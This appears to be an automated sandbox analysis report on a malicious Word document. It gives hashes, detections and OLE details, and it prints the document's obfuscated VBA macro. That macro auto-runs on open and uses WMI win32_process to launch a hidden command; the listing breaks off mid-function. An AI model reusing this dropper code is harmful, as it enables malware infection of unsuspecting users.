                                                                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):354648
                                                                      Entropy (8bit):4.29030621772406
                                                                      Encrypted:false
                                                                      SSDEEP:3072:L82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:I2L7HN7Kl/jLA90QECrYRpj
                                                                      MD5:039810A34BE3DD45B9D30F89E18F46F4
                                                                      SHA1:5F8609A2DB33D6BB70584E1741F428245474146F
                                                                      SHA-256:A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00
                                                                      SHA-512:8ACA60103958AA461A91F708E0E41A401F316161DEFE9525560AC2E03AEA3566E01F0825410E678B0C76DA7551CE48C2200D01380810CF70AC75F9CC91BCF9FF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: Metadefender, Detection: 46%, Browse
                                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: -535, Keywords: 155, Comments: 43, Thumbnail: 21890, 0x17: 917504CDFV2 Microsoft Word
                                                                      Entropy (8bit):6.828949606327576
                                                                      TrID:
                                                                      • Microsoft Word document (32009/1) 79.99%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                      File name:ARCHIVOFile-20-012021.doc
                                                                      File size:163328
                                                                      MD5:d4829a31da294d0ee8f9f67bc1352bd2
                                                                      SHA1:70601272023fd5285194c68da776708508524d50
                                                                      SHA256:4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5
                                                                      SHA512:4a3e4ba0671890787590e7abb39dbea6e4b70334d6b7ee8aafb9559184c3d650cf8a04711ba3e863b675afb400c9c8512bbd85393ee89cf359766831a6581d1d
                                                                      SSDEEP:3072:1/X2TdcrrXyQBsc0vWJVi4IrwVOfMb2Y/:1/PPIIx2Y
                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "ARCHIVOFile-20-012021.doc"

                                                                      Indicators

                                                                      Has Summary Info:True
                                                                      Application Name:unknown
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:True
                                                                      Contains Workbook/Book Stream:False
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:
                                                                      Flash Objects Count:
                                                                      Contains VBA Macros:True

                                                                      Document Summary

                                                                      Document Code Page:-535
                                                                      Number of Lines:155
                                                                      Number of Paragraphs:43
                                                                      Thumbnail Scaling Desired:False
                                                                      Company:
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:917504

                                                                      Streams with VBA

                                                                      VBA File Name: Bcur5699z4d, Stream Size: 1108
                                                                      General
                                                                      Stream Path:Macros/VBA/Bcur5699z4d
                                                                      VBA File Name:Bcur5699z4d
                                                                      Stream Size:1108
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 92 a6 8c 67 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Xqcxarraokjbi
                                                                      False
                                                                      Private
                                                                      VB_Exposed
                                                                      Attribute
                                                                      VB_Creatable
                                                                      VB_Name
                                                                      Document_open()
                                                                      VB_Customizable
                                                                      VB_PredeclaredId
                                                                      VB_GlobalNameSpace
                                                                      VB_Base
                                                                      VB_TemplateDerived
                                                                      VBA Code
                                                                      Attribute VB_Name = "Bcur5699z4d"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Xqcxarraokjbi
End Sub
                                                                      VBA File Name: Nst6otvnmgmpw, Stream Size: 17602
                                                                      General
                                                                      Stream Path:Macros/VBA/Nst6otvnmgmpw
                                                                      VBA File Name:Nst6otvnmgmpw
                                                                      Stream Size:17602
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 a4 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff ac 05 00 00 9c 30 00 00 00 00 00 00 01 00 00 00 92 a6 3f ad 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      crnYCaC
                                                                      RYtzeF
                                                                      ClofCvn
                                                                      BlbPRi:
                                                                      Left(vpWmJA.Range.ParagraphStyle,
                                                                      BlbPRi)
                                                                      kBCITgNAC.Range.ListFormat.ListString
                                                                      aqFpElJ
                                                                      tFspDCJEJ
                                                                      djUnAEBd.Range.ParagraphStyle
                                                                      QjbRmCII
                                                                      rknGHpIJ
                                                                      RmTjACo
                                                                      jdDhS
                                                                      ah_sg
                                                                      InStr(kBCITgNAC.Range.Text,
                                                                      MscjBIE.Range.ParagraphStyle
                                                                      sDmVCG
                                                                      TpAnAB.Range.Text
                                                                      dUBsAD
                                                                      ORjdHplF.Range.Text
                                                                      ueWFHDCC
                                                                      QpteDQ
                                                                      wNsHseJob
                                                                      DagVrchHi.Range.Text
                                                                      NcnmJ
                                                                      aiupjCA.Range.ParagraphStyle
                                                                      pbPXFg
                                                                      SeBOI
                                                                      wgusFA
                                                                      VrghdcJA.Range.Text
                                                                      vXdLFECJ
                                                                      ElseIf
                                                                      pbPXFg.Range.ParagraphStyle
                                                                      mWRkEDBn
                                                                      swJREBktH
                                                                      Len("xxx"))
                                                                      DagVrchHi
                                                                      GvZhcxcBE.Range.ListFormat.ListString
                                                                      clyZlt.Range.ParagraphStyle
                                                                      kBCITgNAC.Range.Text
                                                                      QurlJAjI
                                                                      ah:wsg
                                                                      Left(ORjdHplF.Range.ParagraphStyle,
                                                                      EGxLDh
                                                                      ifZhJxP
                                                                      BdbvZ
                                                                      InStr(KekJrc.Range.Text,
                                                                      SEEmDH
                                                                      ihnSRH
                                                                      djUnAEBd.Range.Text
                                                                      kYUGGMJ.Range.ListFormat.ListString
                                                                      JJqbCtEH
                                                                      ahpsg
                                                                      InStr(MscjBIE.Range.Text,
                                                                      ZBXzADzi
                                                                      dPYykYG
                                                                      InStr(TpAnAB.Range.Text,
                                                                      TpAnAB.Range.ListFormat.ListString
                                                                      Replace(saw,
                                                                      kBCITgNAC.Range.ParagraphStyle
                                                                      ilrmFI
                                                                      QyjOFbQGB
                                                                      Left(GvZhcxcBE.Range.ParagraphStyle,
                                                                      IGyeHIDF
                                                                      DMzpFn
                                                                      MFcvbrIeP
                                                                      WHeXGpVAC
                                                                      nWADOALQ
                                                                      ORjdHplF.Range.ParagraphStyle
                                                                      clyLjDhC
                                                                      oSnKJGCv
                                                                      ODMoFC)
                                                                      CJIuIYEKI
                                                                      KoPDIC
                                                                      gnnIFFf
                                                                      djUnAEBd.Range.ListFormat.ListString
                                                                      XSZpp
                                                                      QrQLEAI
                                                                      hnsxGG
                                                                      tfnHGB
                                                                      LCIxEHv
                                                                      ORjdHplF.Range.ListFormat.ListString
                                                                      Resume
                                                                      vpWmJA.Range.ParagraphStyle
                                                                      InStr(clyZlt.Range.Text,
                                                                      PAyxzTsC
                                                                      dwTYCJwLC)
                                                                      GLKaFEDcX
                                                                      PEaiK.Range.Text
                                                                      zjQpkF
                                                                      KekJrc.Range.ListFormat.ListString
                                                                      wJKPQpiH
                                                                      Left(kYUGGMJ.Range.ParagraphStyle,
                                                                      ruwfBB
                                                                      QrQLEAI:
                                                                      GHJmFFAIm)
                                                                      golkzCJBD
                                                                      FdSuG
                                                                      OtoVEFFI
                                                                      QrQLEAI)
                                                                      "hqkwjbjdasd"
                                                                      GHJmFFAIm:
                                                                      LEeUqk
                                                                      Left(clyZlt.Range.ParagraphStyle,
                                                                      ZAXDGY
                                                                      KnxFzdf
                                                                      kYUGGMJ.Range.ParagraphStyle
                                                                      ubHTxDED
                                                                      LqcVa
                                                                      Left(djUnAEBd.Range.ParagraphStyle,
                                                                      aqFpElJ.Range.Text
                                                                      GvZhcxcBE
                                                                      twfalBEJ
                                                                      HmUuEIbVG
                                                                      KekJrc.Range.Text
                                                                      vpWmJA.Range.Text
                                                                      iGMIJABIz
                                                                      uRNYED
                                                                      ORjdHplF
                                                                      DrqvEr
                                                                      LGONCIz
                                                                      Left(MscjBIE.Range.ParagraphStyle,
                                                                      kyTwIN
                                                                      wTLHBUFzI
                                                                      wNsHseJob.Range.ParagraphStyle
                                                                      WLdYLJOB
                                                                      YfXWF
                                                                      VrzOGkkDJ
                                                                      EWTFmUdCA
                                                                      dUBsAD)
                                                                      KekJrc
                                                                      sVBjGLE
                                                                      dUBsAD:
                                                                      xWqeABhHw
                                                                      bssipAJC
                                                                      Left(pbPXFg.Range.ParagraphStyle,
                                                                      GvZhcxcBE.Range.ParagraphStyle
                                                                      Xqcxarraokjbi()
                                                                      BApwTCG
                                                                      ahgmsg
                                                                      VB_Name
                                                                      CzpmH
                                                                      wTHGJGJ
                                                                      VrghdcJA.Range.ListFormat.ListString
                                                                      wZFCUdE)
                                                                      BRoZbEF
                                                                      wZFCUdE:
                                                                      IEHycIT
                                                                      aqFpElJ.Range.ParagraphStyle
                                                                      "xxxx"
                                                                      bxSXGCyrq
                                                                      rQGxCbRtR
                                                                      aqFpElJ.Range.ListFormat.ListString
                                                                      Mid(Application.Name,
                                                                      InStr(aqFpElJ.Range.Text,
                                                                      aNLHyKGxD
                                                                      InStr(kYUGGMJ.Range.Text,
                                                                      NirTjIE
                                                                      Left(DagVrchHi.Range.ParagraphStyle,
                                                                      aJzPBis.Range.ListFormat.ListString
                                                                      ODMoFC
                                                                      CJIuIYEKI)
                                                                      HwQjGFBhp
                                                                      VrghdcJA.Range.ParagraphStyle
                                                                      CJIuIYEKI:
                                                                      qOgvIXcc
                                                                      PIEpnIEQ
                                                                      InStr(wNsHseJob.Range.Text,
                                                                      TpAnAB.Range.ParagraphStyle
                                                                      AZyYMo
                                                                      RpARJ
                                                                      Paragraph
                                                                      ODMoFC:
                                                                      InStr(aJzPBis.Range.Text,
                                                                      YfXWF)
                                                                      BlbPRi
                                                                      BApwTCG.Range.ParagraphStyle
                                                                      KekJrc.Range.ParagraphStyle
                                                                      xmKhhI
                                                                      Left(PEaiK.Range.ParagraphStyle,
                                                                      PEaiK.Range.ListFormat.ListString
                                                                      ahinsg
                                                                      polxC
                                                                      ahmsg
                                                                      clyZlt.Range.Text
                                                                      vpWmJA.Range.ListFormat.ListString
                                                                      dwTYCJwLC:
                                                                      JozvGJc
                                                                      BApwTCG.Range.ListFormat.ListString
                                                                      ahssg
                                                                      rlKgn
                                                                      PEaiK
                                                                      Left(wNsHseJob.Range.ParagraphStyle,
                                                                      aJzPBis
                                                                      chPFBOFy
                                                                      PyQuEPBH
                                                                      QxPrAc
                                                                      wZFCUdE
                                                                      lSOmIHg
                                                                      GHJmFFAIm
                                                                      gzBJqD
                                                                      BApwTCG.Range.Text
                                                                      yVvECoEYV
                                                                      Left(BApwTCG.Range.ParagraphStyle,
                                                                      InStr(VrghdcJA.Range.Text,
                                                                      Left(KekJrc.Range.ParagraphStyle,
                                                                      Left(aJzPBis.Range.ParagraphStyle,
                                                                      hnsxGG)
                                                                      InStr(BApwTCG.Range.Text,
                                                                      AYQZHEBI
                                                                      elbdiLVN
                                                                      vttGko
                                                                      aiupjCA.Range.ListFormat.ListString
                                                                      InStr(vpWmJA.Range.Text,
                                                                      DagVrchHi.Range.ParagraphStyle
                                                                      PIEpnIEQ)
                                                                      dueIMGo
                                                                      GvZhcxcBE.Range.Text
                                                                      PIEpnIEQ:
                                                                      InStr(pbPXFg.Range.Text,
                                                                      DdtFCGIA
                                                                      Left(VrghdcJA.Range.ParagraphStyle,
                                                                      MscjBIE.Range.Text
                                                                      HgufGDBpC
                                                                      BjqtUGzGV
                                                                      "kkiew")
                                                                      LATJAGVFG
                                                                      fishDz
                                                                      Function
                                                                      InStr(PEaiK.Range.Text,
                                                                      IpndaHM
                                                                      "sjgwb",
                                                                      jhoJOEJc
                                                                      QyjOFbQGB)
                                                                      vpWmJA
                                                                      igIuH
                                                                      DMzpFn)
                                                                      QyjOFbQGB:
                                                                      kYUGGMJ
                                                                      DMzpFn:
                                                                      VGSqAr
                                                                      QgrUG
                                                                      jVymJ
                                                                      Left(aqFpElJ.Range.ParagraphStyle,
                                                                      TpXhGgIp
                                                                      kYUGGMJ.Range.Text
                                                                      OnCoGHI
                                                                      zfIxDdGy
                                                                      uRNYED)
                                                                      pbPXFg.Range.ListFormat.ListString
                                                                      clyZlt.Range.ListFormat.ListString
                                                                      IyCjJCAKS
                                                                      uRNYED:
                                                                      wNsHseJob.Range.ListFormat.ListString
                                                                      kBCITgNAC
                                                                      HFzCp
                                                                      aiupjCA.Range.Text
                                                                      mNAmBCKAC
                                                                      clyZlt
                                                                      hHdBIMIgE
                                                                      MllKTIJEc
                                                                      aJzPBis.Range.Text
                                                                      InStr(GvZhcxcBE.Range.Text,
                                                                      cLxQFB
                                                                      vYqwDI
                                                                      ahcesg
                                                                      ahrosg
                                                                      GLKaFEDcX:
                                                                      lscaG
                                                                      GLKaFEDcX)
                                                                      EiZIHkBmm
                                                                      yigPu
                                                                      CITOv
                                                                      nATRHnACI
                                                                      aiupjCA
                                                                      DagVrchHi.Range.ListFormat.ListString
                                                                      MscjBIE.Range.ListFormat.ListString
                                                                      vlZuYFCC
                                                                      clyLjDhC)
                                                                      ruwfBB)
                                                                      dwTYCJwLC
                                                                      ATQXIsF
                                                                      rvAquNI
                                                                      ruwfBB:
                                                                      clyLjDhC:
                                                                      pbPXFg.Range.Text
                                                                      wNsHseJob.Range.Text
                                                                      zhliJ
                                                                      RxTZR
                                                                      TpAnAB
                                                                      ahtsg
                                                                      bebkDqAH
                                                                      VrghdcJA
                                                                      kFOCACABC
                                                                      Error
                                                                      aiaDHfVAA
                                                                      InStr(DagVrchHi.Range.Text,
                                                                      Attribute
                                                                      FTbqcNF
                                                                      YfXWF:
                                                                      MscjBIE
                                                                      wuVfVIU
                                                                      InStr(aiupjCA.Range.Text,
                                                                      mJzxEXG
                                                                      NVFQOFAXs
                                                                      InStr(ORjdHplF.Range.Text,
                                                                      hnsxGG:
                                                                      PEaiK.Range.ParagraphStyle
                                                                      ykoqBxAG
                                                                      xvhwEkIi
                                                                      HpOdl
                                                                      bEIjwUFFB
                                                                      wHzvQRHCw
                                                                      aJzPBis.Range.ParagraphStyle
                                                                      InStr(djUnAEBd.Range.Text,
                                                                      zfIxDdGy)
                                                                      VGSqAr)
                                                                      zfIxDdGy:
                                                                      Left(aiupjCA.Range.ParagraphStyle,
                                                                      VGSqAr:
                                                                      djUnAEBd
                                                                      Left(kBCITgNAC.Range.ParagraphStyle,
                                                                      Left(TpAnAB.Range.ParagraphStyle,
                                                                      uqBHEDw
                                                                      EqstFcEf
                                                                      NrnOEeCi
                                                                      EBTVGH
                                                                      DvhBN
                                                                      VBA Code
                                                                      Attribute VB_Name = "Nst6otvnmgmpw"
Function Xqcxarraokjbi()
On Error Resume Next
V1 = O9eax2mx6bn5xuv + Bcur5699z4d.Content + Bud375u79tqnjtr8hp
   GoTo hnsxGG
     Dim vpWmJA As Paragraph
Set HwQjGFBhp = bebkDqAH
     For Each vpWmJA In Bcur5699z4d.Paragraphs
Set yVvECoEYV = EWTFmUdCA
       If Left(vpWmJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         hnsxGG = vpWmJA.Range.ListFormat.ListString
       ElseIf InStr(vpWmJA.Range.Text, "kkiew") > 1 Then
         elbdiLVN = vpWmJA.Range.Text
         elbdiLVN = Replace(saw, "sjgwb", "hqkwjbjdasd" & hnsxGG)
         vpWmJA.Range.Text = elbdiLVN
         Set vpWmJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set BdbvZ = ueWFHDCC
     Next vpWmJA
hnsxGG:
U7 = "sg yw ahpsg yw ah"
Xa6pbm6di_vp9mwl = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
   GoTo GHJmFFAIm
     Dim ORjdHplF As Paragraph
Set twfalBEJ = yigPu
     For Each ORjdHplF In Bcur5699z4d.Paragraphs
Set ATQXIsF = wTLHBUFzI
       If Left(ORjdHplF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         GHJmFFAIm = ORjdHplF.Range.ListFormat.ListString
       ElseIf InStr(ORjdHplF.Range.Text, "kkiew") > 1 Then
         JozvGJc = ORjdHplF.Range.Text
         JozvGJc = Replace(saw, "sjgwb", "hqkwjbjdasd" & GHJmFFAIm)
         ORjdHplF.Range.Text = JozvGJc
         Set ORjdHplF.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set QxPrAc = oSnKJGCv
     Next ORjdHplF
GHJmFFAIm:
Jziyk2numi4eksqusj = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
   GoTo GLKaFEDcX
     Dim kYUGGMJ As Paragraph
Set RpARJ = NVFQOFAXs
     For Each kYUGGMJ In Bcur5699z4d.Paragraphs
Set hHdBIMIgE = KoPDIC
       If Left(kYUGGMJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         GLKaFEDcX = kYUGGMJ.Range.ListFormat.ListString
       ElseIf InStr(kYUGGMJ.Range.Text, "kkiew") > 1 Then
         TpXhGgIp = kYUGGMJ.Range.Text
         TpXhGgIp = Replace(saw, "sjgwb", "hqkwjbjdasd" & GLKaFEDcX)
         kYUGGMJ.Range.Text = TpXhGgIp
         Set kYUGGMJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set iGMIJABIz = vlZuYFCC
     Next kYUGGMJ
GLKaFEDcX:
Kdpt7ybnm0buk = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
   GoTo QyjOFbQGB
     Dim wNsHseJob As Paragraph
Set crnYCaC = mJzxEXG
     For Each wNsHseJob In Bcur5699z4d.Paragraphs
Set FdSuG = bssipAJC
       If Left(wNsHseJob.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         QyjOFbQGB = wNsHseJob.Range.ListFormat.ListString
       ElseIf InStr(wNsHseJob.Range.Text, "kkiew") > 1 Then
         DrqvEr = wNsHseJob.Range.Text
         DrqvEr = Replace(saw, "sjgwb", "hqkwjbjdasd" & QyjOFbQGB)
         wNsHseJob.Range.Text = DrqvEr
         Set wNsHseJob.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set HgufGDBpC = IpndaHM
     Next wNsHseJob
QyjOFbQGB:
T_b71hsugbvq289o = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
   GoTo DMzpFn
     Dim MscjBIE As Paragraph
Set AZyYMo = lscaG
     For Each MscjBIE In Bcur5699z4d.Paragraphs
Set cLxQFB = wgusFA
       If Left(MscjBIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         DMzpFn = MscjBIE.Range.ListFormat.ListString
       ElseIf InStr(MscjBIE.Range.Text, "kkiew") > 1 Then
         RxTZR = MscjBIE.Range.Text
         RxTZR = Replace(saw, "sjgwb", "hqkwjbjdasd" & DMzpFn)
         MscjBIE.Range.Text = RxTZR
         Set MscjBIE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set jdDhS = HpOdl
     Next MscjBIE
DMzpFn:
Iybdpqjdde6_svpju7 = Kdpt7ybnm0buk + T_b71hsugbvq289o + Jziyk2numi4eksqusj + U7 + Xa6pbm6di_vp9mwl
   GoTo uRNYED
     Dim GvZhcxcBE As Paragraph
Set WLdYLJOB = PAyxzTsC
     For Each GvZhcxcBE In Bcur5699z4d.Paragraphs
Set RYtzeF = sVBjGLE
       If Left(GvZhcxcBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         uRNYED = GvZhcxcBE.Range.ListFormat.ListString
       ElseIf InStr(GvZhcxcBE.Range.Text, "kkiew") > 1 Then
         mNAmBCKAC = GvZhcxcBE.Range.Text
         mNAmBCKAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & uRNYED)
         GvZhcxcBE.Range.Text = mNAmBCKAC
         Set GvZhcxcBE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set kFOCACABC = RmTjACo
     Next GvZhcxcBE
uRNYED:
H7kfpfj7v13k0 = Yvxv3g2kutodnaylkq(Iybdpqjdde6_svpju7)
   GoTo clyLjDhC
     Dim VrghdcJA As Paragraph
Set kyTwIN = zjQpkF
     For Each VrghdcJA In Bcur5699z4d.Paragraphs
Set xmKhhI = ClofCvn
       If Left(VrghdcJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         clyLjDhC = VrghdcJA.Range.ListFormat.ListString
       ElseIf InStr(VrghdcJA.Range.Text, "kkiew") > 1 Then
         LATJAGVFG = VrghdcJA.Range.Text
         LATJAGVFG = Replace(saw, "sjgwb", "hqkwjbjdasd" & clyLjDhC)
         VrghdcJA.Range.Text = LATJAGVFG
         Set VrghdcJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set IyCjJCAKS = tFspDCJEJ
     Next VrghdcJA
clyLjDhC:
Set W71k24g1fo31hq05ui = CreateObject(H7kfpfj7v13k0)
   GoTo CJIuIYEKI
     Dim djUnAEBd As Paragraph
Set nATRHnACI = rknGHpIJ
     For Each djUnAEBd In Bcur5699z4d.Paragraphs
Set PyQuEPBH = LGONCIz
       If Left(djUnAEBd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         CJIuIYEKI = djUnAEBd.Range.ListFormat.ListString
       ElseIf InStr(djUnAEBd.Range.Text, "kkiew") > 1 Then
         gnnIFFf = djUnAEBd.Range.Text
         gnnIFFf = Replace(saw, "sjgwb", "hqkwjbjdasd" & CJIuIYEKI)
         djUnAEBd.Range.Text = gnnIFFf
         Set djUnAEBd.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set AYQZHEBI = chPFBOFy
     Next djUnAEBd
CJIuIYEKI:
KK = Yvxv3g2kutodnaylkq(Mid(V1, (4), Len(V1)))
W71k24g1fo31hq05ui.Create KK, Twt08i5xpa9fd0, L1e1dxo2wbinf3l6
   GoTo wZFCUdE
     Dim clyZlt As Paragraph
Set JJqbCtEH = rlKgn
     For Each clyZlt In Bcur5699z4d.Paragraphs
Set DdtFCGIA = igIuH
       If Left(clyZlt.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         wZFCUdE = clyZlt.Range.ListFormat.ListString
       ElseIf InStr(clyZlt.Range.Text, "kkiew") > 1 Then
         dPYykYG = clyZlt.Range.Text
         dPYykYG = Replace(saw, "sjgwb", "hqkwjbjdasd" & wZFCUdE)
         clyZlt.Range.Text = dPYykYG
         Set clyZlt.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set OnCoGHI = QgrUG
     Next clyZlt
wZFCUdE:
End Function
Function Yvxv3g2kutodnaylkq(T3bxybxcdn5d)
On Error Resume Next
   GoTo zfIxDdGy
     Dim KekJrc As Paragraph
Set mWRkEDBn = nWADOALQ
     For Each KekJrc In Bcur5699z4d.Paragraphs
Set jhoJOEJc = EqstFcEf
       If Left(KekJrc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         zfIxDdGy = KekJrc.Range.ListFormat.ListString
       ElseIf InStr(KekJrc.Range.Text, "kkiew") > 1 Then
         rvAquNI = KekJrc.Range.Text
         rvAquNI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zfIxDdGy)
         KekJrc.Range.Text = rvAquNI
         Set KekJrc.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set QpteDQ = CITOv
     Next KekJrc
zfIxDdGy:
Zonfu7wvfwo = T3bxybxcdn5d
   GoTo QrQLEAI
     Dim aJzPBis As Paragraph
Set EGxLDh = swJREBktH
     For Each aJzPBis In Bcur5699z4d.Paragraphs
Set uqBHEDw = MllKTIJEc
       If Left(aJzPBis.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         QrQLEAI = aJzPBis.Range.ListFormat.ListString
       ElseIf InStr(aJzPBis.Range.Text, "kkiew") > 1 Then
         golkzCJBD = aJzPBis.Range.Text
         golkzCJBD = Replace(saw, "sjgwb", "hqkwjbjdasd" & QrQLEAI)
         aJzPBis.Range.Text = golkzCJBD
         Set aJzPBis.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set qOgvIXcc = fishDz
     Next aJzPBis
QrQLEAI:
Mgpwbt669dipg22hz = Hbs0geilvqul(Zonfu7wvfwo)
   GoTo VGSqAr
     Dim kBCITgNAC As Paragraph
Set vXdLFECJ = xvhwEkIi
     For Each kBCITgNAC In Bcur5699z4d.Paragraphs
Set SeBOI = vYqwDI
       If Left(kBCITgNAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         VGSqAr = kBCITgNAC.Range.ListFormat.ListString
       ElseIf InStr(kBCITgNAC.Range.Text, "kkiew") > 1 Then
         bxSXGCyrq = kBCITgNAC.Range.Text
         bxSXGCyrq = Replace(saw, "sjgwb", "hqkwjbjdasd" & VGSqAr)
         kBCITgNAC.Range.Text = bxSXGCyrq
         Set kBCITgNAC.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set LqcVa = MFcvbrIeP
     Next kBCITgNAC
VGSqAr:
Yvxv3g2kutodnaylkq = Mgpwbt669dipg22hz
   GoTo ODMoFC
     Dim PEaiK As Paragraph
Set ihnSRH = HmUuEIbVG
     For Each PEaiK In Bcur5699z4d.Paragraphs
Set sDmVCG = gzBJqD
       If Left(PEaiK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         ODMoFC = PEaiK.Range.ListFormat.ListString
       ElseIf InStr(PEaiK.Range.Text, "kkiew") > 1 Then
         NcnmJ = PEaiK.Range.Text
         NcnmJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ODMoFC)
         PEaiK.Range.Text = NcnmJ
         Set PEaiK.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set CzpmH = polxC
     Next PEaiK
ODMoFC:
End Function
Function Hbs0geilvqul(Cxe014lg73v5)
   GoTo dUBsAD
     Dim TpAnAB As Paragraph
Set IEHycIT = ZBXzADzi
     For Each TpAnAB In Bcur5699z4d.Paragraphs
Set BRoZbEF = ZAXDGY
       If Left(TpAnAB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         dUBsAD = TpAnAB.Range.ListFormat.ListString
       ElseIf InStr(TpAnAB.Range.Text, "kkiew") > 1 Then
         FTbqcNF = TpAnAB.Range.Text
         FTbqcNF = Replace(saw, "sjgwb", "hqkwjbjdasd" & dUBsAD)
         TpAnAB.Range.Text = FTbqcNF
         Set TpAnAB.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set bEIjwUFFB = EBTVGH
     Next TpAnAB
dUBsAD:
   GoTo ruwfBB
     Dim BApwTCG As Paragraph
Set ubHTxDED = ilrmFI
